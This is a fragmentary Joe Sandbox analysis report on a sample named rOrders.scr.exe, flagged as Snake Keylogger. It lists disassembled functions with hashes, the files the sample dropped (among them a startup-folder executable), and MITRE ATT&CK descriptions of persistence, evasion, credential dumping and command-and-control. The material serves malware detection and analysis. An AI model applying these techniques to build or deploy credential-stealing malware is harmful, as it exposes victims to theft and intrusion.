Function 014BDF08 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e948de3ca9c92c1679c05a24962d6c2b13bacd8c8d911426d8100bf7bd34f3b2
Instruction ID: 7cac280a3777512f103b79a3c32b14ff47495a87ef33857d9cdcbb78d1bae28b
Opcode Fuzzy Hash: e948de3ca9c92c1679c05a24962d6c2b13bacd8c8d911426d8100bf7bd34f3b2
Instruction Fuzzy Hash: 9EE02230D08248CECB048FA9A8586EEBBB1FBCA300F0095B9D10163160D7B04109CE50

Function 014BD4B4 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b201af8f626f3964d5e3673d1d0c0e5bef1184bedbd866e9ff0a6a1ccc194ff2
Instruction ID: d3052411cd35cba92357a607e517a0fcd3b685127f68856805cddcffd07d70e4
Opcode Fuzzy Hash: b201af8f626f3964d5e3673d1d0c0e5bef1184bedbd866e9ff0a6a1ccc194ff2
Instruction Fuzzy Hash: 02E0DFD2C08140CBE3118BEAA8960F9BF30C9E3215784A4D7D08A8B131D628E207AB21

Function 014B201F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e704fbbdbfc67e0f9680467023741056a99153e1eb2a05f9ef0fa51f328fc3a9
Instruction ID: b3951e6865d7b5b8716d45dd5642e0959885e589fc69552bdf47ab0b96f14270
Opcode Fuzzy Hash: e704fbbdbfc67e0f9680467023741056a99153e1eb2a05f9ef0fa51f328fc3a9
Instruction Fuzzy Hash: 4FE02B31D2022B86CF14D7B4EC404FEFB35EED2260B614666D41033000EB30165EC7A0

Function 014B2020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a8cc9ece53f2876eebb2e116eb360fff686114f98541ab894a313125bbf72d
Instruction ID: 2be7e9a532f9ddf656837a3c96b66edeb62f39ef54a242ce2bd4e50450fd548f
Opcode Fuzzy Hash: 82a8cc9ece53f2876eebb2e116eb360fff686114f98541ab894a313125bbf72d
Instruction Fuzzy Hash: 10D02B31D2022F83CF04E7A5DC004DFF738EEC2260B514622D41033000FB302658C2E0

Function 014B8258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 9bafaace35aa34fda337adb96f9acd01efbdf80da04e4bf24a5a9622ce3a55c6
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 82C0123720D1282AA629108EBC80AE3BB8CC2C12B4A250137F91CA3220A8529C8101B8

Function 014BA70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3fa30db23162d4656de9977f3c397d67a75b05dbde66129eff234be4f44868
Instruction ID: a2806af0a0bd62cfc420ed56dfcdfcee871c0fcc09820dd4c7bb05c451d9f236
Opcode Fuzzy Hash: 1d3fa30db23162d4656de9977f3c397d67a75b05dbde66129eff234be4f44868
Instruction Fuzzy Hash: 95D0677BB410189FCB049F98E8809DDB7B6FB9C221B048516EA15E3261C6319921DB50

Function 014B5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68df1bfec5820aafa0b256514c5addddd8a3810c8af9497756c34ed43ff9e8f8
Instruction ID: e56214c309308babef51eb74bf4dd2f4ae34c4f438862a83dfe81b62dfe76d5f
Opcode Fuzzy Hash: 68df1bfec5820aafa0b256514c5addddd8a3810c8af9497756c34ed43ff9e8f8
Instruction Fuzzy Hash: 7AC01270500B0987C505FBB5FA85655371AB7C0308F406F14B0094611ADE7C2D996692

Function 014B5EB7 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f100052b9ed556d86f67680c517630bd10f6c9d0715940fd3654abe252524e34
Instruction ID: a801336ae6b9aded69b335cd1bbef29f9c0ccbbb898262fd33cd7395f554f113
Opcode Fuzzy Hash: f100052b9ed556d86f67680c517630bd10f6c9d0715940fd3654abe252524e34
Instruction Fuzzy Hash: 85D02230900B0986CA15FBB0FAC26D83B23FBC0308F006F14F0064610BCE791C8AAB42

Non-executed Functions

Function 06A228B0 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

PHsq, xrefs: 06A22DEB
LjVp, xrefs: 06A22C5C
PHsq, xrefs: 06A22BEA
LjVp, xrefs: 06A22C72
0oVp, xrefs: 06A22A00
LjVp, xrefs: 06A22B7A
", xrefs: 06A23087
LjVp, xrefs: 06A22E49
LjVp, xrefs: 06A22D67
PHsq, xrefs: 06A22CE2
PHsq, xrefs: 06A22DD7
PHsq, xrefs: 06A22CF6
PHsq, xrefs: 06A22BFE
LjVp, xrefs: 06A22D51
PHsq, xrefs: 06A22ED2
LjVp, xrefs: 06A22E5F
LjVp, xrefs: 06A22B64
PHsq, xrefs: 06A22EE6

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID: "$0oVp$LjVp$LjVp$LjVp$LjVp$LjVp$LjVp$LjVp$LjVp$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq
API String ID: 0-1005420056
Opcode ID: eebd30889428d4ffc7614ffe4a145c669ec9c9c351f52c1f9b2ecd7d302d2fb2
Instruction ID: 6e289b40dfcd5901a18cedc4dc6b54ba40a64d222c9958ce850c51414a6d440d
Opcode Fuzzy Hash: eebd30889428d4ffc7614ffe4a145c669ec9c9c351f52c1f9b2ecd7d302d2fb2
Instruction Fuzzy Hash: E032C5B4E00229CFDB68DFA9C984B9DBBB2BF89304F1081A9D409A7355DB755E84CF10

Function 06A22809 Relevance: 14.2, Strings: 11, Instructions: 419COMMON

Download Yara Rule

Strings

PHsq, xrefs: 06A22DEB
PHsq, xrefs: 06A22CE2
PHsq, xrefs: 06A22DD7
PHsq, xrefs: 06A22CF6
PHsq, xrefs: 06A22BFE
PHsq, xrefs: 06A22BEA
Hwq, xrefs: 06A22869
0oVp, xrefs: 06A22A00
PHsq, xrefs: 06A22ED2
", xrefs: 06A23087
PHsq, xrefs: 06A22EE6

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID: "$0oVp$Hwq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq
API String ID: 0-3469494655
Opcode ID: 7444a78c054283fb761a5dc8182c4697d354266465697ae78cc5b92f61b564d9
Instruction ID: 42e1b9244e39d46d5bb8b37c5e56b38e6c7ba48915c745776be70a9c83a26e43
Opcode Fuzzy Hash: 7444a78c054283fb761a5dc8182c4697d354266465697ae78cc5b92f61b564d9
Instruction Fuzzy Hash: A512F5B4E002188FDB68DFA9D994BDDBBB2BF89300F1080A9D449AB355DB355E81DF50

Function 06A22807 Relevance: 14.1, Strings: 11, Instructions: 387COMMON

Download Yara Rule

Strings

PHsq, xrefs: 06A22DEB
PHsq, xrefs: 06A22CE2
PHsq, xrefs: 06A22DD7
PHsq, xrefs: 06A22CF6
PHsq, xrefs: 06A22BFE
PHsq, xrefs: 06A22BEA
Hwq, xrefs: 06A22869
0oVp, xrefs: 06A22A00
PHsq, xrefs: 06A22ED2
", xrefs: 06A23087
PHsq, xrefs: 06A22EE6

Memory Dump Source

Source File: 00000009.00000002.4554652700.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6a20000_00.jbxd

Similarity

API ID:
String ID: "$0oVp$Hwq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq
API String ID: 0-3469494655
Opcode ID: 87133bdf79dedaf08977bfe045eb0e99dcee7210f31dca3abe6b464a9e819b63
Instruction ID: a80ef01d8cf2ffa77fba9c1e60d6f61ffada3b841c1396cf14ccf1f18086c213
Opcode Fuzzy Hash: 87133bdf79dedaf08977bfe045eb0e99dcee7210f31dca3abe6b464a9e819b63
Instruction Fuzzy Hash: 0412E4B4E002188FDB68DFA9C984BDDBBB2BF89304F1080A9D449A7355DB355E85DF10

Function 014B2150 Relevance: 5.2, Strings: 4, Instructions: 206COMMON

Download Yara Rule

Strings

Xwq, xrefs: 014B22C7
Xwq, xrefs: 014B2248
Xwq, xrefs: 014B220E
Xwq, xrefs: 014B2314

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: Xwq$Xwq$Xwq$Xwq
API String ID: 0-1964751375
Opcode ID: 5e972b91765c93ad291df01c4cb58b67a7c495c1dd05864b7d18c8c17e3c6e22
Instruction ID: a21bef4e0191b7b306a20ba93e1b3ca9188b9793985764abfbe90b6782e22566
Opcode Fuzzy Hash: 5e972b91765c93ad291df01c4cb58b67a7c495c1dd05864b7d18c8c17e3c6e22
Instruction Fuzzy Hash: FA71D570E042198FDF299BB8C890BEFBBB5BF88300F10456AD515A7361DB709D85CBA1

Function 014B6088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;sq, xrefs: 014B609E
\;sq, xrefs: 014B6094
\;sq, xrefs: 014B60BA
\;sq, xrefs: 014B60C6

Memory Dump Source

Source File: 00000009.00000002.4535176790.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_14b0000_00.jbxd

Similarity

API ID:
String ID: \;sq$\;sq$\;sq$\;sq
API String ID: 0-2251010532
Opcode ID: cfd772751aeb6c015f9251546f4c5bc61fdc177de1fbbb6c57914f56e40e5637
Instruction ID: e808027fca43615fa8f771cf327dc85dd775ebed40ee76b121ab7e978d24674d
Opcode Fuzzy Hash: cfd772751aeb6c015f9251546f4c5bc61fdc177de1fbbb6c57914f56e40e5637
Instruction Fuzzy Hash: 21017CB17140149FDB24CA2EC4C49A6B7F6BFD8660726817BE601CB3B1DA72DC4297A0

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rOrders.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxu3p2yk.blh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iez5e3yu.3xw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0tezrkx.nwx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yr0xxvb0.bn4.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Windows Analysis Report
rOrders.scr.exe

Function 07A71C80 Relevance: 6.9, Strings: 5, Instructions: 651
COMMON

Function 0115AD48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198
COMMON

Function 051618E4 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre